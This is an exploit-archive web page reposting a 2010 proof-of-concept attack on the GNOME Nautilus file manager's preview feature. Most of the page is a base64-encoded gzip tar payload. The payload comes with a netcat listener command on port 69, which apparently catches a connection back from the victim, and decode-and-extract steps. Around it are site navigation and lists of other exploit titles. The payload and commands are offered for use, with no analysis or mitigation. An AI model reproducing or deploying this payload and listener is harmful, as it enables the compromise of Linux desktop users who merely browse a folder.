首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
This is a proof of concept exploit for GNOME's Nautilus file manager version 2.2
来源:joe.dhon[at]sverige.nu 作者:Joe Dohn 发布时间:2010-02-11  
According to the GNOME documentations, the file manager (Nautilus) is able
to display a preview of most of the files. My Proof Of Concept works using
the default settings. (tested on VirtualBox: Ubuntu, 2.6.28-17-generic,
GNOME, Nautilus 2.26.2)

++++ BEGIN BASE64 CONTENT ++++
H4sIAMnba0sAA+3TW2vbMBQH8Lwmn8L4yYHUl1xp042tgbWBhIWmY4WxB9U+TrTJkisd59JPXylr
QtjD1hbKGJyfH2wsHekvS96UIlxiUXtLsdXvdt09GfTi47uTdON2LUk6nfag1+t3OrU4iXtJt+bF
b5rqSWWQac+r/VDwx35/a/9PnZtU8xLfN+oS0KSshNBAWmmO23Cm+YoLWMCUSbYAHYJkdwIOrwP/
i+Qr0IaJ29lISQkp+s1ho76yXzT33nkjVZRKgkQTpoIZA+ab/6FQD1wIFiq9iHI7TiRUysQw8b83
6mGqgSGMpd0UmUJwNACXCDpnKZhQmvHE1Xyy1W663DZy/MpxOWO4DPwIMI1KO986O8Th5jl57DdY
K/1zl+uEy7LCE4M2UvHCeC7Z2JXPd9UuBDe7lEHeijdx0nIHv9uSlRD7hOZ5EX/tl9uHXb5XxZsf
xvgtpNmn5KY59FwqDfc2lYS1dzudXCGW13BfgcHAdbeNoSpBBv7s8/zGb3n+0vY4i6KkPQhjeyVn
/dPIvkddwaHAnhjNM5jyAm62pT1FCBuMNoXw910M4NM0V8Ay0IE/0pBxNG6K/FpdXj60vLk9phdq
403YnTmqlNlHc8El09vArcauLNs9sBXjwi05aDZt7/Nof/D/9R9ICCGEEEIIIYQQQgghhBBCCCGE
EELI6z0CpVq6YQAoAAA=
++++ END BASE64 CONTENT ++++

sloshy@thx:~$ sudo nc -v -l -p 69
listening on [any] 69 ...

base64 -d poc.b64 > poc.tar.gz
tar zxf poc.tar.gz

May the Poc be with you :]=~  (maew �)














































-----------------------------------------
Skaffa gratis e-post du ocks� p� http://www.sverige.nu



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Vermillion FTP Daemon PORT Com
·PLS PLA WMDownloader proof of
·PLS PLA‏ WMDownloader (P
·Magic_Block1_2 suffers from a
·LDAP Injection POC
·Microsoft Internet Explorer ve
·Linux bin/cat /etc/passwd 43 b
·feedDemon v3.1.0.9 opml File B
·M.J.M. Quick Player v1.2 Unico
·WM Downloader v3.0.0.9 PLS PLA
·Ipswitch IMail Server - IMAP4
·Win32 Shellcode (cmd.exe) for
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved